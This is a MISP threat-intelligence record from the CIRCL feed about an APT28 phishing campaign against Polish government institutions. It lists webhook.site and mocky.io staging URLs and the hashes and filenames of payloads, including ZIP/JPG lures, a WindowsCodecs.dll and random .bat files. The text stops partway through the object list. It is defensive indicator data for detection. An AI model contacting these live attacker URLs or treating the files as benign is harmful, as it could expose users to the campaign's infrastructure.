misp-circl-feed/feeds/circl/misp/482a37ad-cfaf-41cc-9bef-b3829dde3b3f.json

{
  "Event": {
    "analysis": "2",
    "date": "2024-05-08",
    "extends_uuid": "",
    "info": "OSINT - Kampania APT28 skierowana przeciwko polskim instytucjom rz\u0105dowym",
    "publish_timestamp": "1715185455",
    "published": true,
    "threat_level_id": "1",
    "timestamp": "1715185445",
    "uuid": "482a37ad-cfaf-41cc-9bef-b3829dde3b3f",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#4d24f9",
        "local": false,
        "name": "misp-galaxy:threat-actor=\"APT28\"",
        "relationship_type": ""
      },
      {
        "colour": "#004646",
        "local": false,
        "name": "type:OSINT",
        "relationship_type": ""
      },
      {
        "colour": "#0071c3",
        "local": false,
        "name": "osint:lifetime=\"perpetual\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:clear",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184058",
        "to_ids": true,
        "type": "url",
        "uuid": "f0af1be5-d2c8-4ddf-9d57-9bf7dceed0ce",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "23970f3c-2986-4e12-b55f-c629dac5ebfb",
        "value": "https://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "bfc758b1-8afb-47a9-a767-197d6dcc004a",
        "value": "https://webhook.site/4ba464d9-0675-4a7a-9966-8f84e93290ba"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "7a1ccc03-2df7-4910-8ab6-f40951ae3a54",
        "value": "https://webhook.site/577b82c3-7249-44e9-9353-5eab106fead6"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "d6c193c7-77b0-45a1-91a6-096533a7dedf",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=127df518-52be-46c5-bbb2-0479f4b9693b"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "71e4b1ed-9eeb-44dd-89fa-4e60a176d6a3",
        "value": "https://webhook.site/127df518-52be-46c5-bbb2-0479f4b9693b"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "3a3b37ab-7c28-4180-b49e-3405fc48e21d",
        "value": "https://webhook.site/0ef0dcf7-f258-4d02-b274-cbf62a2000cf"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "1b098eb3-6e65-4775-91b2-6dfc35baf929",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=c1112bb3-0e6e-4ba4-abe7-fb31388b47ad"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "43fab00f-72bb-451e-bb09-5ba843085dfb",
        "value": "https://webhook.site/c1112bb3-0e6e-4ba4-abe7-fb31388b47ad"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "cbce462f-feaf-41a6-90db-9e38b5adc9e2",
        "value": "https://webhook.site/3f396db1-2016-4b69-9ec3-ffc417d5f3aa"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "3c560a1e-1d26-45dd-af08-737305275867",
        "value": "https://webhook.site/66ea3bbc-29dc-4ece-b804-71c6ec7b77b6"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "a3bbc289-fcab-49d0-ab03-2a203aa44903",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=efb79108-a2b5-4cba-844d-6352bb8fad8c"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "439aa2c4-c37b-415e-85c9-be0f8990e4b4",
        "value": "https://webhook.site/efb79108-a2b5-4cba-844d-6352bb8fad8c"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "5c79383a-0631-4f82-88e4-57120f9597b9",
        "value": "https://webhook.site/9c87649c-220d-425d-8331-ffc8d9b94a38"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "4a7fea0d-9558-41d9-b981-90bd88ba4d99",
        "value": "https://webhook.site/c618ea32-2923-4c12-8151-8d0002b56af0"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "d1ffe610-609e-40f6-87be-4a21d44b090f",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=f97bcee0-0d91-4503-a30c-027f1b34820f"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "ba2aa92c-fc43-4b07-bc20-e0a42f2e4d71",
        "value": "https://webhook.site/f97bcee0-0d91-4503-a30c-027f1b34820f"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "69f76094-9840-4013-8575-3f3c382b1c0f",
        "value": "https://webhook.site/9a9cdaf8-120c-4de9-b17a-d6d8e2796a3b"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "ff8056f1-4392-4fd7-9b4f-13ab3ae6f68a",
        "value": "https://webhook.site/e13d23aa-b6f8-4491-9adc-71f7f8c438df"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "0d341018-48fd-4d78-a554-e607cc901dd4",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5e4c7949-30a2-4477-9e9b-e8828fc76a1b"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "036d34e6-c2d9-448f-8d53-a9311ddca779",
        "value": "https://webhook.site/5e4c7949-30a2-4477-9e9b-e8828fc76a1b"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "dbb31adf-72bb-440c-a697-b6854b432ed1",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5100fcc0-f6be-4b09-8c58-5a8a6706ec4f"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "301d5b93-11e9-4306-9862-7d49419c1ad0",
        "value": "https://webhook.site/5100fcc0-f6be-4b09-8c58-5a8a6706ec4f"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "d5d0c2fa-20ae-4f4b-ae30-c7eeb340b2af",
        "value": "https://webhook.site/7674f06b-e435-4470-a594-6d59578c552d"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "310fdbe5-523f-4b48-ba70-ce9f25c74876",
        "value": "https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "a8c11946-d787-437c-be15-bf8c454ce1b3",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=508da0df-7ec9-420e-b1fe-958fbbe699d1"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "3f269f7c-2d0e-4a9f-acc7-6132f24ac8eb",
        "value": "https://webhook.site/508da0df-7ec9-420e-b1fe-958fbbe699d1"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "72ab91d7-e187-4932-b069-a489d120bb85",
        "value": "https://webhook.site/bec23763-b8d9-4191-99ba-04a4a163b4de"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "61100d52-cca2-4cdf-bf3f-ff8a133e01c4",
        "value": "https://webhook.site/90fea98f-fbdb-4847-be03-409d02a43caf"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "ddc055aa-b7fa-408f-b19d-678f015ffd46",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=bc349b93-b047-42f8-a421-d45e3ec94dc5"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "9cc77420-c9c0-4b64-b96e-67ddacf80263",
        "value": "https://webhook.site/bc349b93-b047-42f8-a421-d45e3ec94dc5"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "164b007d-2dde-4362-acf5-204ab51e0cef",
        "value": "https://webhook.site/5a8758c6-5702-4fea-9d5e-4fbdb6dd795f"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "413e49e1-6430-41d7-a3b0-52aff962ead9",
        "value": "https://webhook.site/b10bd697-1a9f-4ec7-aa2f-1fa84ad916a1"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "0515787f-aa33-4099-9c69-fa76b3cf5ecd",
        "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=1658772a-4de8-4368-a604-980c90b0a1ed"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "55bdfb1f-0650-4312-9f89-785d6dcc4eec",
        "value": "https://webhook.site/1658772a-4de8-4368-a604-980c90b0a1ed"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "529af1e0-a4c6-4d7f-8db9-e15c262130a4",
        "value": "https://webhook.site/4fe5885c-f2f6-4905-8bc7-aef1a046a134"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1715184059",
        "to_ids": true,
        "type": "url",
        "uuid": "b73b5534-0ebb-4516-a112-263e3f9e8b71",
        "value": "https://webhook.site/0d2dc90e-2d5e-49f8-8249-d7ab955c387a"
      }
    ],
    "Object": [
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184102",
        "uuid": "8fc240e5-c496-4027-b9ce-2bf83632f084",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184102",
            "to_ids": true,
            "type": "sha256",
            "uuid": "0741808a-ba3a-484f-8766-d66491885933",
            "value": "2bd9591bea6b1f4128e4819e3888b45b193d5a2722672b839ad7ae120bf9af3d"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184102",
            "to_ids": true,
            "type": "filename",
            "uuid": "54cd6722-7b01-4619-9f80-9f23fc3825af",
            "value": "IMG-1030873974629655576.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184148",
        "uuid": "e02fd994-a773-46cd-ad55-c1cc542c9861",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184148",
            "to_ids": true,
            "type": "sha256",
            "uuid": "169d9555-ad87-47e5-b02d-6210e48fb27e",
            "value": "52b8bfbd9ef8ecfd54e71c74a7131cb7b3cc61ea01bc6ce17cbe7aef14acc948"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184148",
            "to_ids": true,
            "type": "filename",
            "uuid": "ecf31c68-2c8d-4c35-8b96-65420d58f167",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184163",
        "uuid": "4b228653-3eef-4646-b8ff-76d6c1bfeb32",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184163",
            "to_ids": true,
            "type": "sha256",
            "uuid": "26e07573-f4e2-4022-99c1-a0ca8a3dc24d",
            "value": "4001498463dc8f8010ef1cc803b67ac434ff26d67d132933a187697aa2e88ef1"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184163",
            "to_ids": true,
            "type": "filename",
            "uuid": "01a70bf7-34d1-4170-ac50-2dfb483470f6",
            "value": "bcpcn.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184180",
        "uuid": "a5bf9b3e-3b08-4e06-b2b4-585239b73b05",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184180",
            "to_ids": true,
            "type": "sha256",
            "uuid": "3ad0b72d-b65e-4366-a30d-9c90f817d014",
            "value": "158d49cce44968ddd028b1ef5ebc2a5183a31f05707f9dc699f0c47741be84db"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184180",
            "to_ids": true,
            "type": "filename",
            "uuid": "c2a415b4-cfde-4485-aae9-a88eb8d69e63",
            "value": "IMG-1030873974629655576.jpg"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184199",
        "uuid": "a29f2969-d1e9-4b3f-a96b-5c1a8348a7f3",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184199",
            "to_ids": true,
            "type": "sha256",
            "uuid": "7a7113b4-855f-47d5-a58b-8080feb8bc6f",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184199",
            "to_ids": true,
            "type": "filename",
            "uuid": "34267455-e29c-4153-94b4-80b52f916ee9",
            "value": "kpqsklcrdsonoknaote.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184221",
        "uuid": "3766bd1a-2bef-493b-bd2e-a73a914e4b54",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184221",
            "to_ids": true,
            "type": "sha256",
            "uuid": "b14cfe48-745d-4137-9d68-3e4753d143b8",
            "value": "7c6689f591ce2ccd6713df62d5135820f94bdbf2e035ab70e6b3c6746865a898"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184221",
            "to_ids": true,
            "type": "filename",
            "uuid": "a3ba37c4-891f-481f-9843-659e80921c19",
            "value": "IMG-7214532.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184251",
        "uuid": "82038fdd-a441-4c72-a1da-f101ded09359",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184251",
            "to_ids": true,
            "type": "sha256",
            "uuid": "0cd0dbc9-deef-4e8d-8e62-1448bdc4844e",
            "value": "c968f9dd1f16a435901d2b93a028a0ae2508e943c8f480935a529826deb3dbeb"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184251",
            "to_ids": true,
            "type": "filename",
            "uuid": "2fb0b2d0-4f17-40b9-86b9-652ef620b948",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184266",
        "uuid": "d58f687b-98d0-460f-a87d-2d45b7fbcaa9",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184266",
            "to_ids": true,
            "type": "sha256",
            "uuid": "bb323c3b-a23c-4d10-baa7-aaa7ef118fc2",
            "value": "34cabc0ff2f216830ffe217e8f8d0fa4b7d3a167576745aba48b7e62f546207b"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184266",
            "to_ids": true,
            "type": "filename",
            "uuid": "63f0b04b-6c3b-4ad6-8847-397740d00110",
            "value": "zdesdyf.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184317",
        "uuid": "2a5ee9a3-916c-4992-ab21-033dd67b6833",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184317",
            "to_ids": true,
            "type": "sha256",
            "uuid": "a333f2a5-c897-42a6-8970-eeed952508f5",
            "value": "e1069c8677d64226f7881e8504ed7a13f79f43f143842ea6c1c8b2cc680ed6c2"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184317",
            "to_ids": true,
            "type": "filename",
            "uuid": "0d39321c-be79-4270-b06f-bf8394d33fb8",
            "value": "IMG-238279780.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184342",
        "uuid": "d092b3d7-6adf-4a2e-973c-0e17a5c4d4cc",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184342",
            "to_ids": true,
            "type": "sha256",
            "uuid": "301ab892-2a9b-48be-aadf-649957ae48e5",
            "value": "43ff178e428373512b83f85db32f364fc19c9a4ac7317835bd5089915b8727b5"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184342",
            "to_ids": true,
            "type": "filename",
            "uuid": "816948af-2839-4252-83a0-d722778461e6",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184359",
        "uuid": "50ff16f1-a066-4a6c-8497-212e69bc2d18",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184359",
            "to_ids": true,
            "type": "sha256",
            "uuid": "f97b5658-140f-4ec8-a043-36ce0561fcb4",
            "value": "ca700d44db08ad2ebd52278a3b303f8c13e44847a507fb317ea5dfb6cc924a76"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184359",
            "to_ids": true,
            "type": "filename",
            "uuid": "c6cdfe8c-89e6-43d9-840b-ac582d6af343",
            "value": "hjpxswjdkayzwfphx.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184382",
        "uuid": "aaf5a34f-eebc-41f2-8abd-b7286c0ba236",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184382",
            "to_ids": true,
            "type": "sha256",
            "uuid": "3207b31d-8352-4c3f-aaa4-83dcbc6b992b",
            "value": "bab7e81395e1e9ee1680c3bb702c44b1b13ee5e67fa893d765284ae168de8369"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184382",
            "to_ids": true,
            "type": "filename",
            "uuid": "fac94f78-1773-4961-bd6f-1bd02dbad953",
            "value": "IMG-238279780.jpg"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184413",
        "uuid": "759bb98f-4791-4ef8-bbee-c0ad4df19e01",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184413",
            "to_ids": true,
            "type": "sha256",
            "uuid": "f9206a63-af42-425d-bcf1-c855cc3f1484",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184413",
            "to_ids": true,
            "type": "filename",
            "uuid": "a12e0672-06a7-404e-93a6-380faab66f53",
            "value": "vngradn.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184434",
        "uuid": "ef6ba0b7-6e5e-4df8-aee7-7c857a1f3f8b",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184434",
            "to_ids": true,
            "type": "sha256",
            "uuid": "114c1bf2-8cb0-45a3-9c88-f02224afdffd",
            "value": "38ae06833528db02cb3a315d96ad2a664b732b5620675028a8c5e059e820514f"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184434",
            "to_ids": true,
            "type": "filename",
            "uuid": "f0e61fc6-0ead-4fd8-af7c-7b9f527123d0",
            "value": "IMG-810629002957075004.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184451",
        "uuid": "e03676a9-bcba-4136-a229-40ef123c6564",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184451",
            "to_ids": true,
            "type": "sha256",
            "uuid": "7c02261c-f54e-4c00-9d8b-a8595acb2688",
            "value": "ee433ddd5988ab7325b92378c6d3cb736ddb7f1bad75b939e8c931f417660129"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184451",
            "to_ids": true,
            "type": "filename",
            "uuid": "18652901-be76-47c5-b64d-61142bcd49c2",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184466",
        "uuid": "1e584f6d-896b-4b68-81c3-29f18dc32a5a",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184466",
            "to_ids": true,
            "type": "sha256",
            "uuid": "7f7a5075-3ae9-4a93-a70e-4fa9a7888f35",
            "value": "9ddf5561562a62961a6fcac1dc49633cb79f5d3c8cc9b95fd9f87e7be70d2d35"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184467",
            "to_ids": true,
            "type": "filename",
            "uuid": "3995c1c2-c48d-4759-a455-7fac69faccdd",
            "value": "yvrlqpkgngppjp.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184480",
        "uuid": "4506ab04-f5a2-403f-8ca2-c043ed14869d",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184480",
            "to_ids": true,
            "type": "sha256",
            "uuid": "d039a351-0b3d-426b-8084-ccaf849d78ea",
            "value": "dfd1f3229f903887f2474f361a26273dc63a6221883e86c5eea2dec9521dc081"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184480",
            "to_ids": true,
            "type": "filename",
            "uuid": "d227dcb6-f7bd-4225-a3cd-6170d8f809e0",
            "value": "IMG-810629002957075004.jpg"
          }
        ]
      },
      {
